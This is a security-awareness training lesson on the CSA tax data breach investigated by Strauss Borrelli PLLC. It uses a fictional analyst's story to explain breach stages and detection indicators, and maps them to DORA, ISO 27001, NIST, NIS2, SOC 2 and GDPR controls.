Lesson 1.1: CSA Tax Data Breach Investigation - Strauss Borrelli PLLC Deep Dive

Compliance Framework Mapping

Introduction

Welcome to Lesson 1.1: CSA Tax Data Breach Investigation - Strauss Borrelli PLLC Deep Dive! Over the next 45 minutes, we will explore the anatomy of a major data breach, focusing on the investigation led by the law firm Strauss Borrelli PLLC and the threat intelligence lessons we can draw from it.

But first, let me tell you about Marcus Webb.

It's 3:17 PM on a Tuesday in late October. Marcus Webb, a senior IT security analyst at a mid-sized financial services firm in London, is reviewing the latest batch of automated alerts. The office is quiet, the only sound the hum of servers from the adjacent data room and the faint tapping of his keyboard. He sips cold coffee, his eyes scanning lines of log data on the central monitoring dashboard.

A cluster of alerts from the customer database server catches his eye. They're flagged as 'unusual login attempts' but the pattern is odd—they originate from an internal IP address, one used by the development team. The timestamps show activity over the weekend, which is unusual but not impossible. He makes a note to check with the dev lead later. The system hasn't flagged it as critical, and his dashboard is already cluttered with similar medium-priority warnings.

He dismisses the alert group, marking it for follow-up. It's a decision based on workload and a system that cried wolf too often. He doesn't know that the internal IP has been compromised for weeks, that the 'unusual logins' were a threat actor methodically mapping the database schema, and that the real exfiltration of sensitive customer tax data began 48 hours ago, masked as legitimate backup traffic.

This is the story of a Data Breach. By the end of this lesson, you'll understand exactly why Marcus never stood a chance, and more importantly, what could have saved him.

Content Section 1: What is the CSA Tax Data Breach?

Think of a data breach not as a single event, but as a slow-motion burglary. The thief isn't smashing a window; they're copying your house key, learning your schedule, and moving your valuables out one piece at a time while you're home. The CSA breach, investigated by Strauss Borrelli PLLC, followed this exact pattern.

The Nature of the Compromise

The breach involved unauthorised access to systems holding sensitive taxpayer information. The investigation by Strauss Borrelli PLLC, a firm specialising in data breach litigation and response, would have focused on determining the scope, source, and legal implications of the access.

In such breaches, the target is often data with high resale value on criminal forums or data that can be used for targeted fraud. Tax data is particularly attractive because it contains names, addresses, social security or national insurance numbers, and financial details—a complete kit for identity theft.

The legal investigation aims to establish liability, notify affected parties as required by law, and coordinate with regulators. The firm's deep dive would dissect the timeline, the point of entry, and the security failures that allowed the breach to occur and persist.

The Investigation's Role as Threat Intelligence

The findings from a firm like Strauss Borrelli PLLC become a rich source of threat intelligence. They document not just the 'what' but the 'how'—the specific tactics, techniques, and procedures (TTPs) used by the threat actors.

This intelligence is valuable because it moves beyond generic warnings. It provides concrete indicators of compromise (IoCs), such as specific malware hashes, command-and-control server domains, or unusual data access patterns, that other organisations can use to hunt for similar activity in their own networks.

DORA Article 5-17 DORA's ICT risk management framework requires financial entities to have processes for learning from incidents. Analysing detailed breach investigations like this one feeds directly into updating threat landscapes and control measures.

ISO A.5 ISO 27001 A.5 on information security policies requires that policies are reviewed based on changing threats. Intelligence from real-world breaches provides the evidence needed to justify and direct those policy reviews.

Content Section 2: The Attack Anatomy

Understanding the typical flow of a data breach reveals why it's so effective. Let me show you exactly how an attacker, in a scenario like the one Marcus faced, operates.

The Breach Lifecycle

First, initial access. This rarely starts with a direct attack on a fortified database. It often begins with a phishing email to a developer, leading to compromised credentials for a less-secure system, like a code repository or a project management tool. From that initial foothold, the attacker moves laterally.

Second, discovery and persistence. Once inside, the attacker uses the stolen credentials to explore the network, often using legitimate IT admin tools to avoid detection. They seek out database servers, file shares, and backup systems. They may install a lightweight backdoor to maintain access even if the initial compromised account is reset.

Third, collection and exfiltration. The attacker identifies the target data—in this case, tax records. They often compress and encrypt the data inside the network before sending it out. Exfiltration is masked to look like normal traffic, such as outbound HTTPS connections to cloud storage or large, scheduled 'backup' transfers.

Key Technical Components

Attackers rely on living-off-the-land binaries (LoLBins)—legitimate system tools like PowerShell, WMI, or certutil—to perform malicious actions. This makes their behaviour blend in with normal admin activity.

Data is often staged in a compressed archive on an internal server with high outbound bandwidth before being transferred. The use of common ports and protocols for exfiltration makes it difficult to block without disrupting business.

Why Traditional Defences Fail

Notice what all of these methods have in common. They focus on preventing a loud, obvious intrusion. A modern data breach is a silent, patient process that abuses normal system functions.

Let's break down why the security controls Marcus likely relied on didn't stop the breach.

NIST ID.RA-1 NIST CSF ID.RA-1 requires identifying vulnerabilities. This attack anatomy shows that vulnerabilities aren't just software flaws—they include misconfigurations, excessive user privileges, and weak detection capabilities, all of which must be in scope for assessment.

NIS2 Article 21 NIS2 Article 21 mandates risk management measures. Understanding this attack flow demonstrates that measures must address the entire attack chain, from initial access to exfiltration, not just the perimeter.

Content Section 3: Detection: Seeing What Marcus Missed

Marcus's monitoring system knew something was wrong. It just couldn't tell him clearly. The signals were there, buried in noise. Here's what a threat intelligence-led detection strategy looks for.

Network-Level Indicators

Look for internal lateral movement that doesn't match normal user behaviour. A developer's account accessing a database server it has no business need for. A server making SMB or RDP connections to multiple other servers in a short timeframe.

Monitor for large, outbound data transfers, especially outside business hours. Even over HTTPS, the volume and timing can be a signal. A server that normally sends 50MB of logs per day suddenly pushing 15GB to an external IP is a major red flag.

DNS query analysis can reveal beaconing to command-and-control servers. Look for repeated queries for suspicious or newly registered domains from internal assets, particularly non-user endpoints like servers.

Endpoint-Level Indicators

Process lineage is key. Why is a Microsoft Word document spawning a PowerShell process? Why is PowerShell downloading a file from an internal server? Tools that track parent-child process relationships can spot these anomalous chains.

Look for evidence of credential dumping. Unexpected access by the LSASS process, or the presence of tools like Mimikatz (or its signatures in memory) on a workstation or server. Also, monitor for the installation of persistence mechanisms like new scheduled tasks or services.

Identity and Access Signals

A core signal is logins from unusual locations or times. An account used only in London logging in from a foreign IP, or a service account logging in interactively late at night.

Monitor for privilege escalation. A standard user account being added to a privileged group like Domain Admins, or a spike in the use of privileged accounts for routine tasks. Also, look for a single account accessing a high volume of sensitive files or database records in a short period—the 'collection' phase of the attack.

SOC2 CC1.1 SOC 2 CC1.1 on integrity and ethical values requires a control environment that deters and detects wrongdoing. Implementing these specific detection mechanisms demonstrates a proactive commitment to identifying malicious activity, not just relying on preventive controls.

GDPR Article 32 GDPR Article 32 requires appropriate security of personal data. A key part of security is the 'ability to ensure the ongoing confidentiality, integrity, availability and resilience of processing systems.' Effective detection capabilities are necessary to ensure that confidentiality and integrity breaches are identified in a timely manner.

Content Section 4: Building Your Compliance Evidence

Compliance documentation often feels like filling out forms for an exam you never took. But after this lesson, you've sat through a masterclass on a real-world test. Your notes aren't just paperwork; they're proof of understanding.

Evidence Generation

This lesson provides documentation for multiple compliance frameworks:

For DORA Article 5-17 auditors... For DORA auditors, you can now demonstrate that key personnel have undergone training on specific data breach TTPs relevant to the financial sector, contributing to your ICT risk management framework.

For ISO A.5 auditors... For ISO 27001 assessors, you can evidence that information security awareness training includes current, real-world threat scenarios (like data exfiltration techniques), informing the ongoing review of security policies.

For NIST ID.RA-1 auditors... For NIST CSF reviewers, you can show that your threat identification process incorporates analysis of real breach investigations to understand vulnerabilities beyond software flaws, such as detection gaps and credential misuse.

Audit Trail

Document your completion of this lesson:

• Lesson title and date completed
• Time invested: approximately 45 minutes
• Key learnings in your own words
• Activity submission reference
• Follow-up actions identified (e.g., question for security team from Activity)

Conclusion

Let me tell you how Marcus's story ended.

The breach was discovered six weeks later by an external fraud monitoring service, not by internal tools. By then, over 100,000 customer records had been exfiltrated. Marcus's organisation faced regulatory fines, mandatory credit monitoring for affected customers, and significant reputational damage. An internal review found Marcus had followed procedure, but the procedure was based on outdated threat models. He left the company a few months later.

The organisation eventually hired a threat intelligence firm, implemented user and entity behaviour analytics (UEBA), and began regular 'purple team' exercises where defenders actively hunted for the TTPs used in recent industry breaches. They learned to look for sequences of events, not just single alerts.

But it doesn't have to be your story. That's why we're here.

You should now understand the slow, methodical nature of a modern data breach. You understand why traditional, perimeter-focused defences are insufficient. You know the key behavioural and technical indicators that signal such an attack is in progress. And you understand how breach investigations provide the concrete threat intelligence needed to build better defences.

Next, we'll explore Next, we'll explore Lesson 1.2: Building a Threat-Informed Detection Strategy. We'll translate these indicators into concrete SIEM rules, logging requirements, and hunting hypotheses you can propose in your organisation.

See you there.

Resources

The course materials folder contains downloadable resources for this lesson:

• Lesson 1.1 Quick Reference Card - Summarise the key detection indicators for data breach attacks (lateral movement patterns, exfiltration signals, credential misuse) and immediate investigative steps on a single page.
• Compliance Mapping Worksheet - Map the specific data breach TTPs from this lesson to control requirements in the DORA, ISO 27001, NIST CSF, NIS2, SOC 2, and GDPR frameworks.
• Risk Assessment Template - Assess your organisation's exposure to data breach threats based on the attack vectors covered, focusing on detection gaps in lateral movement and data exfiltration.
• Further reading - Links to the MITRE ATT&CK framework (for TTP mapping), and guidance from NCSC and ENISA on detecting and responding to data breaches.

CSA Tax Data Breach Investigation - Strauss Borrelli PLLC Defence Masterclass | Threat Intelligence | Lesson 1.1
© LimitedView Limited | 2026